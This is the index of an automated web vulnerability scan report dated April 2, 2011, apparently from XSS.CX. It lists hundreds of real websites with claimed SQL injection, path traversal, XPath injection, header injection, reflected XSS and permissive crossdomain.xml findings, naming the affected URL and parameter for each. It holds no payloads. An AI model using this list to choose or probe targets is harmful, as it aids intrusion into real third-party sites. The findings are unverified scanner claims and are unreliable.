XSS, SQL Injection, HTTP Header Injection, DORK Report for April 2, 2011

CWE-79: Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')

Report generated by XSS.CX at Sat Apr 02 09:55:17 CDT 2011.


1. SQL injection

1.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [shv parameter]

1.3. http://www.airtran.com/favicon.ico [REST URL parameter 1]

1.4. http://www.bbt.com/favicon.ico [REST URL parameter 1]

1.5. http://www.dealtime.com/favicon.ico [REST URL parameter 1]

1.6. http://www.essortment.com/favicon.ico [REST URL parameter 1]

1.7. http://www.ftd.com/favicon.ico [REST URL parameter 1]

1.8. http://www.guitarcenter.com/favicon.ico [User-Agent HTTP header]

1.9. http://www.inc.com/favicon.ico [REST URL parameter 1]

1.10. http://www.psu.edu/favicon.ico [Referer HTTP header]

1.11. http://www.psu.edu/favicon.ico [User-Agent HTTP header]

1.12. http://www.scholastic.com/favicon.ico [REST URL parameter 1]

2. File path traversal

2.1. http://www.bodybuilding.com/favicon.ico [REST URL parameter 1]

2.2. http://www.buzzfeed.com/favicon.ico [REST URL parameter 1]

2.3. http://www.cabelas.com/favicon.ico [REST URL parameter 1]

2.4. http://www.info.com/favicon.ico [REST URL parameter 1]

3. XPath injection

3.1. http://www.cartoonnetwork.com/favicon.ico [REST URL parameter 1]

3.2. http://www.ning.com/favicon.ico [REST URL parameter 1]

3.3. http://www.thefind.com/favicon.ico [REST URL parameter 1]

3.4. http://www.wwe.com/favicon.ico [REST URL parameter 1]

4. HTTP PUT enabled

5. HTTP header injection

5.1. http://www.ew.com/favicon.ico [REST URL parameter 1]

5.2. http://www.familyeducation.com/favicon.ico [REST URL parameter 1]

5.3. http://www.health.com/favicon.ico [REST URL parameter 1]

5.4. http://www.homestead.com/favicon.ico [REST URL parameter 1]

5.5. http://www.instyle.com/favicon.ico [REST URL parameter 1]

5.6. http://www.livingsocial.com/favicon.ico [REST URL parameter 1]

5.7. http://www.people.com/favicon.ico [REST URL parameter 1]

5.8. http://www.peoplestylewatch.com/favicon.ico [REST URL parameter 1]

5.9. http://www.salesforce.com/favicon.ico [REST URL parameter 1]

5.10. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.11. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

5.12. http://www.tbo.com/favicon.ico [REST URL parameter 1]

5.13. http://www.thisoldhouse.com/favicon.ico [REST URL parameter 1]

5.14. http://www.wn.com/favicon.ico [REST URL parameter 1]

5.15. http://www.youravon.com/favicon.ico [REST URL parameter 1]

6. Cross-site scripting (reflected)

6.1. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [adurl parameter]

6.2. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [ai parameter]

6.3. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [client parameter]

6.4. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [num parameter]

6.5. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sig parameter]

6.6. http://ad.doubleclick.net/adi/N1260.Google.com/B5219922.27 [sz parameter]

6.7. http://www.4shared.com/favicon.ico [REST URL parameter 1]

6.8. http://www.4shared.com/favicon.ico [REST URL parameter 1]

6.9. http://www.aboutus.org/favicon.ico [REST URL parameter 1]

6.10. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

6.11. http://www.allbusiness.com/favicon.ico [REST URL parameter 1]

6.12. http://www.allvoices.com/favicon.ico [REST URL parameter 1]

6.13. http://www.answerbag.com/favicon.ico [REST URL parameter 1]

6.14. http://www.beyond.com/favicon.ico [REST URL parameter 1]

6.15. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

6.16. http://www.biblegateway.com/favicon.ico [REST URL parameter 1]

6.17. http://www.blackplanet.com/favicon.ico [REST URL parameter 1]

6.18. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

6.19. http://www.blurtit.com/favicon.ico [REST URL parameter 1]

6.20. http://www.booking.com/favicon.ico [REST URL parameter 1]

6.21. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.22. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.23. http://www.buzzillions.com/favicon.ico [REST URL parameter 1]

6.24. http://www.caringbridge.org/favicon.ico [REST URL parameter 1]

6.25. http://www.cliffsnotes.com/favicon.ico [REST URL parameter 1]

6.26. http://www.colbertnation.com/favicon.ico [REST URL parameter 1]

6.27. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

6.28. http://www.collegehumor.com/favicon.ico [REST URL parameter 1]

6.29. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.30. http://www.collegehumor.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.31. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

6.32. http://www.craveonline.com/favicon.ico [REST URL parameter 1]

6.33. http://www.csmonitor.com/favicon.ico [REST URL parameter 1]

6.34. http://www.docstoc.com/favicon.ico [REST URL parameter 1]

6.35. http://www.domaintools.com/favicon.ico [REST URL parameter 1]

6.36. http://www.driverside.com/favicon.ico [REST URL parameter 1]

6.37. http://www.education.com/favicon.ico [REST URL parameter 1]

6.38. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

6.39. http://www.egotastic.com/favicon.ico [REST URL parameter 1]

6.40. http://www.elyrics.net/favicon.ico [REST URL parameter 1]

6.41. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

6.42. http://www.elyricsworld.com/favicon.ico [REST URL parameter 1]

6.43. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.44. http://www.elyricsworld.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.45. http://www.everydayhealth.com/favicon.ico [REST URL parameter 1]

6.46. http://www.gamespot.com/favicon.ico [REST URL parameter 1]

6.47. http://www.gamestop.com/favicon.ico [REST URL parameter 1]

6.48. http://www.gather.com/favicon.ico [REST URL parameter 1]

6.49. http://www.gather.com/favicon.ico [REST URL parameter 1]

6.50. http://www.gourmandia.com/favicon.ico [REST URL parameter 1]

6.51. http://www.healthline.com/favicon.ico [REST URL parameter 1]

6.52. http://www.healthline.com/favicon.ico [REST URL parameter 1]

6.53. http://www.hollywood.com/favicon.ico [REST URL parameter 1]

6.54. http://www.inc.com/favicon.ico [REST URL parameter 1]

6.55. http://www.instructables.com/favicon.ico [REST URL parameter 1]

6.56. http://www.kaboose.com/favicon.ico [REST URL parameter 1]

6.57. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

6.58. http://www.letssingit.com/favicon.ico [REST URL parameter 1]

6.59. http://www.mainstreet.com/favicon.ico [REST URL parameter 1]

6.60. http://www.manta.com/favicon.ico [REST URL parameter 1]

6.61. http://www.manta.com/favicon.ico [REST URL parameter 1]

6.62. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.63. http://www.manta.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.64. http://www.marthastewart.com/favicon.ico [REST URL parameter 1]

6.65. http://www.mayoclinic.com/favicon.ico [REST URL parameter 1]

6.66. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.67. http://www.mayoclinic.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.68. http://www.mediaite.com/favicon.ico [REST URL parameter 1]

6.69. http://www.motime.com/favicon.ico [REST URL parameter 1]

6.70. http://www.motime.com/favicon.ico [REST URL parameter 1]

6.71. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

6.72. http://www.mp3raid.com/favicon.ico [REST URL parameter 1]

6.73. http://www.mycricket.com/favicon.ico [REST URL parameter 1]

6.74. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

6.75. http://www.mylifetime.com/favicon.ico [REST URL parameter 1]

6.76. http://www.nydailynews.com/favicon.ico [REST URL parameter 1]

6.77. http://www.oodle.com/favicon.ico [REST URL parameter 1]

6.78. http://www.oodle.com/favicon.ico [REST URL parameter 1]

6.79. http://www.pronto.com/favicon.ico [REST URL parameter 1]

6.80. http://www.rent.com/favicon.ico [REST URL parameter 1]

6.81. http://www.rent.com/favicon.ico [REST URL parameter 1]

6.82. http://www.reverbnation.com/favicon.ico [REST URL parameter 1]

6.83. http://www.shangri-la.com/favicon.ico [REST URL parameter 1]

6.84. http://www.shopcompanion.com/favicon.ico [REST URL parameter 1]

6.85. http://www.smarter.com/favicon.ico [REST URL parameter 1]

6.86. http://www.soft82.com/favicon.ico [REST URL parameter 1]

6.87. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

6.88. http://www.songmeanings.net/favicon.ico [REST URL parameter 1]

6.89. http://www.spike.com/favicon.ico [REST URL parameter 1]

6.90. http://www.supercheats.com/favicon.ico [REST URL parameter 1]

6.91. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.92. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.93. http://www.tarot.com/favicon.ico [REST URL parameter 1]

6.94. http://www.thedailybeast.com/favicon.ico [REST URL parameter 1]

6.95. http://www.thedailyshow.com/favicon.ico [REST URL parameter 1]

6.96. http://www.thehollywoodgossip.com/favicon.ico [REST URL parameter 1]

6.97. http://www.thirdage.com/favicon.ico [REST URL parameter 1]

6.98. http://www.thomasnet.com/favicon.ico [REST URL parameter 1]

6.99. http://www.tradekey.com/favicon.ico [REST URL parameter 1]

6.100. http://www.trails.com/favicon.ico [REST URL parameter 1]

6.101. http://www.travelpod.com/favicon.ico [REST URL parameter 1]

6.102. http://www.videojug.com/favicon.ico [REST URL parameter 1]

6.103. http://www.videosurf.com/favicon.ico [REST URL parameter 1]

6.104. http://www.walletpop.com/favicon.ico [REST URL parameter 1]

6.105. http://www.washington.edu/favicon.ico [REST URL parameter 1]

6.106. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

6.107. http://www.wowhead.com/favicon.ico [REST URL parameter 1]

6.108. http://www.yakaz.com/favicon.ico [REST URL parameter 1]

6.109. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

6.110. http://www.yellowpages.com/favicon.ico [REST URL parameter 1]

6.111. http://www.yourdictionary.com/favicon.ico [REST URL parameter 1]

6.112. http://www.kcom.com/contact-us/ [Referer HTTP header]

6.113. http://www.canada.com/favicon.ico [REST URL parameter 1]

6.114. http://www.multiply.com/favicon.ico [REST URL parameter 1]

6.115. http://www.multiply.com/favicon.ico [REST URL parameter 1]

6.116. http://www.multiply.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.117. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.118. http://www.shop.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.119. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.120. http://www.shopcompanion.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.121. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

6.122. http://www.townhall.com/favicon.ico [name of an arbitrarily supplied request parameter]

7. Flash cross-domain policy

7.1. http://ad.doubleclick.net/crossdomain.xml

7.2. http://fls.doubleclick.net/crossdomain.xml

7.3. http://s0.2mdn.net/crossdomain.xml

7.4. http://smp.adviva.net/crossdomain.xml

7.5. http://www.43things.com/crossdomain.xml

7.6. http://www.about.com/crossdomain.xml

7.7. http://www.accesshollywood.com/crossdomain.xml

7.8. http://www.accuweather.com/crossdomain.xml

7.9. http://www.addictinggames.com/crossdomain.xml

7.10. http://www.adriver.ru/crossdomain.xml

7.11. http://www.ajc.com/crossdomain.xml

7.12. http://www.allvoices.com/crossdomain.xml

7.13. http://www.ally.com/crossdomain.xml

7.14. http://www.ancestry.com/crossdomain.xml

7.15. http://www.answerstv.com/crossdomain.xml

7.16. http://www.apartmenthomeliving.com/crossdomain.xml

7.17. http://www.apartments.com/crossdomain.xml

7.18. http://www.archive.org/crossdomain.xml

7.19. http://www.askmen.com/crossdomain.xml

7.20. http://www.atom.com/crossdomain.xml

7.21. http://www.babelgum.com/crossdomain.xml

7.22. http://www.biblegateway.com/crossdomain.xml

7.23. http://www.bigpoint.com/crossdomain.xml

7.24. http://www.bizjournals.com/crossdomain.xml

7.25. http://www.blackberry.com/crossdomain.xml

7.26. http://www.blogs.com/crossdomain.xml

7.27. http://www.bloomberg.com/crossdomain.xml

7.28. http://www.boostmobile.com/crossdomain.xml

7.29. http://www.bravotv.com/crossdomain.xml

7.30. http://www.break.com/crossdomain.xml

7.31. http://www.buzznet.com/crossdomain.xml

7.32. http://www.cafemom.com/crossdomain.xml

7.33. http://www.cbs.com/crossdomain.xml

7.34. http://www.cbsinteractive.com/crossdomain.xml

7.35. http://www.cbssports.com/crossdomain.xml

7.36. http://www.clear-request.com/crossdomain.xml

7.37. http://www.cmt.com/crossdomain.xml

7.38. http://www.colbertnation.com/crossdomain.xml

7.39. http://www.collegehumor.com/crossdomain.xml

7.40. http://www.comedycentral.com/crossdomain.xml

7.41. http://www.contactatonce.com/crossdomain.xml

7.42. http://www.cracked.com/crossdomain.xml

7.43. http://www.crackle.com/crossdomain.xml

7.44. http://www.craveonline.com/crossdomain.xml

7.45. http://www.curse.com/crossdomain.xml

7.46. http://www.daylife.com/crossdomain.xml

7.47. http://www.degrees.info/crossdomain.xml

7.48. http://www.docstoc.com/crossdomain.xml

7.49. http://www.doctoroz.com/crossdomain.xml

7.50. http://www.ebaumsworld.com/crossdomain.xml

7.51. http://www.education.com/crossdomain.xml

7.52. http://www.ehow.co.uk/crossdomain.xml

7.53. http://www.eventful.com/crossdomain.xml

7.54. http://www.everydayhealth.com/crossdomain.xml

7.55. http://www.evtv1.com/crossdomain.xml

7.56. http://www.ew.com/crossdomain.xml

7.57. http://www.ez-tracks.com/crossdomain.xml

7.58. http://www.flixster.com/crossdomain.xml

7.59. http://www.freeonlinegames.com/crossdomain.xml

7.60. http://www.g4tv.com/crossdomain.xml

7.61. http://www.gamerdna.com/crossdomain.xml

7.62. http://www.gamesradar.com/crossdomain.xml

7.63. http://www.gametrailers.com/crossdomain.xml

7.64. http://www.gourmandia.com/crossdomain.xml

7.65. http://www.greenwichmeantime.com/crossdomain.xml

7.66. http://www.groupon.com/crossdomain.xml

7.67. http://www.health.com/crossdomain.xml

7.68. http://www.hiconversion.com/crossdomain.xml

7.69. http://www.hodesiq.com/crossdomain.xml

7.70. http://www.hollywoodreporter.com/crossdomain.xml

7.71. http://www.howstuffworks.com/crossdomain.xml

7.72. http://www.huffingtonpost.com/crossdomain.xml

7.73. http://www.imagebam.com/crossdomain.xml

7.74. http://www.imageshack.us/crossdomain.xml

7.75. http://www.ingdirect.com/crossdomain.xml

7.76. http://www.instructables.com/crossdomain.xml

7.77. http://www.instyle.com/crossdomain.xml

7.78. http://www.intellicast.com/crossdomain.xml

7.79. http://www.kaboodle.com/crossdomain.xml

7.80. http://www.like.com/crossdomain.xml

7.81. http://www.liveleak.com/crossdomain.xml

7.82. http://www.manualsonline.com/crossdomain.xml

7.83. http://www.mapquest.com/crossdomain.xml

7.84. http://www.marthastewart.com/crossdomain.xml

7.85. http://www.mate1.net/crossdomain.xml

7.86. http://www.menshealth.com/crossdomain.xml

7.87. http://www.metacafe.com/crossdomain.xml

7.88. http://www.metrolyrics.com/crossdomain.xml

7.89. http://www.minorleaguebaseball.com/crossdomain.xml

7.90. http://www.mlb.com/crossdomain.xml

7.91. http://www.mmo-champion.com/crossdomain.xml

7.92. http://www.mtv.com/crossdomain.xml

7.93. http://www.myrecipes.com/crossdomain.xml

7.94. http://www.ncm.com/crossdomain.xml

7.95. http://www.newser.com/crossdomain.xml

7.96. http://www.newsok.com/crossdomain.xml

7.97. http://www.nickjr.com/crossdomain.xml

7.98. http://www.nola.com/crossdomain.xml

7.99. http://www.nydailynews.com/crossdomain.xml

7.100. http://www.oodle.com/crossdomain.xml

7.101. http://www.openforum.com/crossdomain.xml

7.102. http://www.opportunity.co/crossdomain.xml

7.103. http://www.outdoorchannel.com/crossdomain.xml

7.104. http://www.pcworld.com/crossdomain.xml

7.105. http://www.people.com/crossdomain.xml

7.106. http://www.peoplestylewatch.com/crossdomain.xml

7.107. http://www.pittsburghlive.com/crossdomain.xml

7.108. http://www.playfin.com/crossdomain.xml

7.109. http://www.pokerstars.com/crossdomain.xml

7.110. http://www.popularscreensavers.com/crossdomain.xml

7.111. http://www.rawtube.com/crossdomain.xml

7.112. http://www.realsimple.com/crossdomain.xml

7.113. http://www.redorbit.com/crossdomain.xml

7.114. http://www.scout.com/crossdomain.xml

7.115. http://www.sendspace.com/crossdomain.xml

7.116. http://www.sfgate.com/crossdomain.xml

7.117. http://www.sheknows.com/crossdomain.xml

7.118. http://www.shockwave.com/crossdomain.xml

7.119. http://www.slideshare.net/crossdomain.xml

7.120. http://www.spike.com/crossdomain.xml

7.121. http://www.sportsnetwork.com/crossdomain.xml

7.122. http://www.swagbucks.com/crossdomain.xml

7.123. http://www.syfy.com/crossdomain.xml

7.124. http://www.tampabay.com/crossdomain.xml

7.125. http://www.tastebook.com/crossdomain.xml

7.126. http://www.teennick.com/crossdomain.xml

7.127. http://www.terra.com/crossdomain.xml

7.128. http://www.thedailybeast.com/crossdomain.xml

7.129. http://www.thedailyshow.com/crossdomain.xml

7.130. http://www.theonion.com/crossdomain.xml

7.131. http://www.thisoldhouse.com/crossdomain.xml

7.132. http://www.time.com/crossdomain.xml

7.133. http://www.totalbeauty.com/crossdomain.xml

7.134. http://www.travelpod.com/crossdomain.xml

7.135. http://www.urbanspoon.com/crossdomain.xml

7.136. http://www.ustream.tv/crossdomain.xml

7.137. http://www.vh1.com/crossdomain.xml

7.138. http://www.videosurf.com/crossdomain.xml

7.139. http://www.weather.gov/crossdomain.xml

7.140. http://www.weatherbug.com/crossdomain.xml

7.141. http://www.webkinz.com/crossdomain.xml

7.142. http://www.webmd.com/crossdomain.xml

7.143. http://www.wix.com/crossdomain.xml

7.144. http://www.wowhead.com/crossdomain.xml

7.145. http://www.wunderground.com/crossdomain.xml

7.146. http://www.xanga.com/crossdomain.xml

7.147. http://www.yardbarker.com/crossdomain.xml

7.148. http://www.yfrog.com/crossdomain.xml

7.149. http://www.younghollywood.com/crossdomain.xml

7.150. http://www.yourfilehost.com/crossdomain.xml

7.151. http://www.zillow.com/crossdomain.xml

7.152. http://www.zoosnet.net/crossdomain.xml

7.153. http://www.zvents.com/crossdomain.xml

7.154. http://googleads.g.doubleclick.net/crossdomain.xml

7.155. http://pagead2.googlesyndication.com/crossdomain.xml

7.156. http://www.123greetings.com/crossdomain.xml

7.157. http://www.4shared.com/crossdomain.xml

7.158. http://www.4tubemate.com/crossdomain.xml

7.159. http://www.6pm.com/crossdomain.xml

7.160. http://www.acehardware.com/crossdomain.xml

7.161. http://www.adobe.com/crossdomain.xml

7.162. http://www.ae.com/crossdomain.xml

7.163. http://www.aeropostale.com/crossdomain.xml

7.164. http://www.allbusiness.com/crossdomain.xml

7.165. http://www.allposters.com/crossdomain.xml

7.166. http://www.allrecipes.com/crossdomain.xml

7.167. http://www.altavista.com/crossdomain.xml

7.168. http://www.amazon.co.uk/crossdomain.xml

7.169. http://www.americangreetings.com/crossdomain.xml

7.170. http://www.aolnews.com/crossdomain.xml

7.171. http://www.apple.com/crossdomain.xml

7.172. http://www.associatedcontent.com/crossdomain.xml

7.173. http://www.astrology.com/crossdomain.xml

7.174. http://www.att.com/crossdomain.xml

7.175. http://www.azcentral.com/crossdomain.xml

7.176. http://www.babiesrus.com/crossdomain.xml

7.177. http://www.babycenter.com/crossdomain.xml

7.178. http://www.barackobama.com/crossdomain.xml

7.179. http://www.barbie.com/crossdomain.xml

7.180. http://www.barnesandnoble.com/crossdomain.xml

7.181. http://www.bathandbodyworks.com/crossdomain.xml

7.182. http://www.bbc.co.uk/crossdomain.xml

7.183. http://www.bettycrocker.com/crossdomain.xml

7.184. http://www.blastro.com/crossdomain.xml

7.185. http://www.blogtv.com/crossdomain.xml

7.186. http://www.bluemountain.com/crossdomain.xml

7.187. http://www.bnet.com/crossdomain.xml

7.188. http://www.bodybuilding.com/crossdomain.xml

7.189. http://www.britannica.com/crossdomain.xml

7.190. http://www.businessweek.com/crossdomain.xml

7.191. http://www.buy.com/crossdomain.xml

7.192. http://www.cabelas.com/crossdomain.xml

7.193. http://www.canada.com/crossdomain.xml

7.194. http://www.candystand.com/crossdomain.xml

7.195. http://www.caranddriver.com/crossdomain.xml

7.196. http://www.careerbuilder.com/crossdomain.xml

7.197. http://www.careerrookie.com/crossdomain.xml

7.198. http://www.carnival.com/crossdomain.xml

7.199. http://www.cars.com/crossdomain.xml

7.200. http://www.cartoonnetwork.com/crossdomain.xml

7.201. http://www.casttv.com/crossdomain.xml

7.202. http://www.cbc.ca/crossdomain.xml

7.203. http://www.cbsnews.com/crossdomain.xml

7.204. http://www.chacha.com/crossdomain.xml

7.205. http://www.charlotteobserver.com/crossdomain.xml

7.206. http://www.chemistry.com/crossdomain.xml

7.207. http://www.chevrolet.com/crossdomain.xml

7.208. http://www.chicagotribune.com/crossdomain.xml

7.209. http://www.chow.com/crossdomain.xml

7.210. http://www.chron.com/crossdomain.xml

7.211. http://www.cisco.com/crossdomain.xml

7.212. http://www.classmates.com/crossdomain.xml

7.213. http://www.clocklink.com/crossdomain.xml

7.214. http://www.clubpenguin.com/crossdomain.xml

7.215. http://www.cnbc.com/crossdomain.xml

7.216. http://www.cnet.com/crossdomain.xml

7.217. http://www.cnn.com/crossdomain.xml

7.218. http://www.cobaltnitra.com/crossdomain.xml

7.219. http://www.collegeboard.com/crossdomain.xml

7.220. http://www.comcast.net/crossdomain.xml

7.221. http://www.consumerreports.org/crossdomain.xml

7.222. http://www.consumersearch.com/crossdomain.xml

7.223. http://www.costco.com/crossdomain.xml

7.224. http://www.dailyfinance.com/crossdomain.xml

7.225. http://www.dailykos.com/crossdomain.xml

7.226. http://www.dailymotion.com/crossdomain.xml

7.227. http://www.dallascowboys.com/crossdomain.xml

7.228. http://www.dallasnews.com/crossdomain.xml

7.229. http://www.datpiff.com/crossdomain.xml

7.230. http://www.dell.com/crossdomain.xml

7.231. http://www.demdex.net/crossdomain.xml

7.232. http://www.dickssportinggoods.com/crossdomain.xml

7.233. http://www.directv.com/crossdomain.xml

7.234. http://www.discovery.com/crossdomain.xml

7.235. http://www.diynetwork.com/crossdomain.xml

7.236. http://www.dslreports.com/crossdomain.xml

7.237. http://www.dt00.net/crossdomain.xml

7.238. http://www.ebay.ca/crossdomain.xml

7.239. http://www.economist.com/crossdomain.xml

7.240. http://www.edmunds.com/crossdomain.xml

7.241. http://www.eharmony.com/crossdomain.xml

7.242. http://www.elle.com/crossdomain.xml

7.243. http://www.emedtv.com/crossdomain.xml

7.244. http://www.engadget.com/crossdomain.xml

7.245. http://www.entertonement.com/crossdomain.xml

7.246. http://www.eonline.com/crossdomain.xml

7.247. http://www.epa.gov/crossdomain.xml

7.248. http://www.etsy.com/crossdomain.xml

7.249. http://www.evite.com/crossdomain.xml

7.250. http://www.expedia.com/crossdomain.xml

7.251. http://www.factmonster.com/crossdomain.xml

7.252. http://www.familyeducation.com/crossdomain.xml

7.253. http://www.famousfootwear.com/crossdomain.xml

7.254. http://www.fandango.com/crossdomain.xml

7.255. http://www.fanfiction.net/crossdomain.xml

7.256. http://www.fanpop.com/crossdomain.xml

7.257. http://www.fantage.com/crossdomain.xml

7.258. http://www.fastcompany.com/crossdomain.xml

7.259. http://www.fedex.com/crossdomain.xml

7.260. http://www.fidelity.com/crossdomain.xml

7.261. http://www.finishline.com/crossdomain.xml

7.262. http://www.food.com/crossdomain.xml

7.263. http://www.foodnetwork.com/crossdomain.xml

7.264. http://www.forbes.com/crossdomain.xml

7.265. http://www.freelotto.com/crossdomain.xml

7.266. http://www.ft.com/crossdomain.xml

7.267. http://www.ftd.com/crossdomain.xml

7.268. http://www.funbrain.com/crossdomain.xml

7.269. http://www.funnyordie.com/crossdomain.xml

7.270. http://www.gaiaonline.com/crossdomain.xml

7.271. http://www.gamespot.com/crossdomain.xml

7.272. http://www.gamestop.com/crossdomain.xml

7.273. http://www.gamevance.com/crossdomain.xml

7.274. http://www.gap.com/crossdomain.xml

7.275. http://www.gather.com/crossdomain.xml

7.276. http://www.geico.com/crossdomain.xml

7.277. http://www.gifts.com/crossdomain.xml

7.278. http://www.godaddy.com/crossdomain.xml

7.279. http://www.goodreads.com/crossdomain.xml

7.280. http://www.guardian.co.uk/crossdomain.xml

7.281. http://www.hallmark.com/crossdomain.xml

7.282. http://www.hbo.com/crossdomain.xml

7.283. http://www.healthcentral.com/crossdomain.xml

7.284. http://www.hgtv.com/crossdomain.xml

7.285. http://www.hhs.gov/crossdomain.xml

7.286. http://www.hi5.com/crossdomain.xml

7.287. http://www.history.com/crossdomain.xml

7.288. http://www.hollywood.com/crossdomain.xml

7.289. http://www.hollywoodlife.com/crossdomain.xml

7.290. http://www.homedepot.com/crossdomain.xml

7.291. http://www.hp.com/crossdomain.xml

7.292. http://www.hsn.com/crossdomain.xml

7.293. http://www.hulu.com/crossdomain.xml

7.294. http://www.ichotelsgroup.com/crossdomain.xml

7.295. http://www.ikea.com/crossdomain.xml

7.296. http://www.ilike.com/crossdomain.xml

7.297. http://www.imdb.com/crossdomain.xml

7.298. http://www.indiatimes.com/crossdomain.xml

7.299. http://www.infoplease.com/crossdomain.xml

7.300. http://www.intel.com/crossdomain.xml

7.301. http://www.intuit.com/crossdomain.xml

7.302. http://www.ioffer.com/crossdomain.xml

7.303. http://www.istockphoto.com/crossdomain.xml

7.304. http://www.itt-tech.edu/crossdomain.xml

7.305. http://www.iwin.com/crossdomain.xml

7.306. http://www.jtv.com/crossdomain.xml

7.307. http://www.justin.tv/crossdomain.xml

7.308. http://www.kaboose.com/crossdomain.xml

7.309. http://www.kbb.com/crossdomain.xml

7.310. http://www.kenexa.com/crossdomain.xml

7.311. http://www.king.com/crossdomain.xml

7.312. http://www.kmart.com/crossdomain.xml

7.313. http://www.kodakgallery.com/crossdomain.xml

7.314. http://www.kraftrecipes.com/crossdomain.xml

7.315. http://www.krillion.com/crossdomain.xml

7.316. http://www.last.fm/crossdomain.xml

7.317. http://www.latimes.com/crossdomain.xml

7.318. http://www.legacy.com/crossdomain.xml

7.319. http://www.lego.com/crossdomain.xml

7.320. http://www.livecams.com/crossdomain.xml

7.321. http://www.livenation.com/crossdomain.xml

7.322. http://www.llbean.com/crossdomain.xml

7.323. http://www.macys.com/crossdomain.xml

7.324. http://www.mail.com/crossdomain.xml

7.325. http://www.marykay.com/crossdomain.xml

7.326. http://www.mastercard.com/crossdomain.xml

7.327. http://www.match.com/crossdomain.xml

7.328. http://www.mcafee.com/crossdomain.xml

7.329. http://www.medcohealth.com/crossdomain.xml

7.330. http://www.medscape.com/crossdomain.xml

7.331. http://www.meebo.com/crossdomain.xml

7.332. http://www.meetlocals.com/crossdomain.xml

7.333. http://www.meetup.com/crossdomain.xml

7.334. http://www.megaupload.com/crossdomain.xml

7.335. http://www.megavideo.com/crossdomain.xml

7.336. http://www.merck.com/crossdomain.xml

7.337. http://www.merriam-webster.com/crossdomain.xml

7.338. http://www.military.com/crossdomain.xml

7.339. http://www.mindjolt.com/crossdomain.xml

7.340. http://www.miniclip.com/crossdomain.xml

7.341. http://www.miracleworkers.com/crossdomain.xml

7.342. http://www.mocospace.com/crossdomain.xml

7.343. http://www.modelmayhem.com/crossdomain.xml

7.344. http://www.moshimonsters.com/crossdomain.xml

7.345. http://www.moviesunlimited.com/crossdomain.xml

7.346. http://www.msnbc.com/crossdomain.xml

7.347. http://www.mybloglog.com/crossdomain.xml

7.348. http://www.mycokerewards.com/crossdomain.xml

7.349. http://www.myheritage.com/crossdomain.xml

7.350. http://www.mylifetime.com/crossdomain.xml

7.351. http://www.myspace.com/crossdomain.xml

7.352. http://www.myxer.com/crossdomain.xml

7.353. http://www.myyearbook.com/crossdomain.xml

7.354. http://www.nascar.com/crossdomain.xml

7.355. http://www.nationalgeographic.com/crossdomain.xml

7.356. http://www.nba.com/crossdomain.xml

7.357. http://www.nbc.com/crossdomain.xml

7.358. http://www.nbcnewyork.com/crossdomain.xml

7.359. http://www.netflix.com/crossdomain.xml

7.360. http://www.newegg.com/crossdomain.xml

7.361. http://www.newport-news.com/crossdomain.xml

7.362. http://www.newsvine.com/crossdomain.xml

7.363. http://www.newsweek.com/crossdomain.xml

7.364. http://www.nfl.com/crossdomain.xml

7.365. http://www.nhl.com/crossdomain.xml

7.366. http://www.nike.com/crossdomain.xml

7.367. http://www.npr.org/crossdomain.xml

7.368. http://www.nwsource.com/crossdomain.xml

7.369. http://www.nypost.com/crossdomain.xml

7.370. http://www.nytimes.com/crossdomain.xml

7.371. http://www.opentable.com/crossdomain.xml

7.372. http://www.opera.com/crossdomain.xml

7.373. http://www.opinionshere.com/crossdomain.xml

7.374. http://www.oprah.com/crossdomain.xml

7.375. http://www.oracle.com/crossdomain.xml

7.376. http://www.ourstage.com/crossdomain.xml

7.377. http://www.overstock.com/crossdomain.xml

7.378. http://www.pandora.com/crossdomain.xml

7.379. http://www.parentsconnect.com/crossdomain.xml

7.380. http://www.partypoker.com/crossdomain.xml

7.381. http://www.paypal.com/crossdomain.xml

7.382. http://www.pbs.org/crossdomain.xml

7.383. http://www.pch.com/crossdomain.xml

7.384. http://www.pchlotto.com/crossdomain.xml

7.385. http://www.petfinder.com/crossdomain.xml

7.386. http://www.petside.com/crossdomain.xml

7.387. http://www.petsmart.com/crossdomain.xml

7.388. http://www.pga.com/crossdomain.xml

7.389. http://www.pgatour.com/crossdomain.xml

7.390. http://www.philly.com/crossdomain.xml

7.391. http://www.picnik.com/crossdomain.xml

7.392. http://www.playsushi.com/crossdomain.xml

7.393. http://www.plentyoffish.com/crossdomain.xml

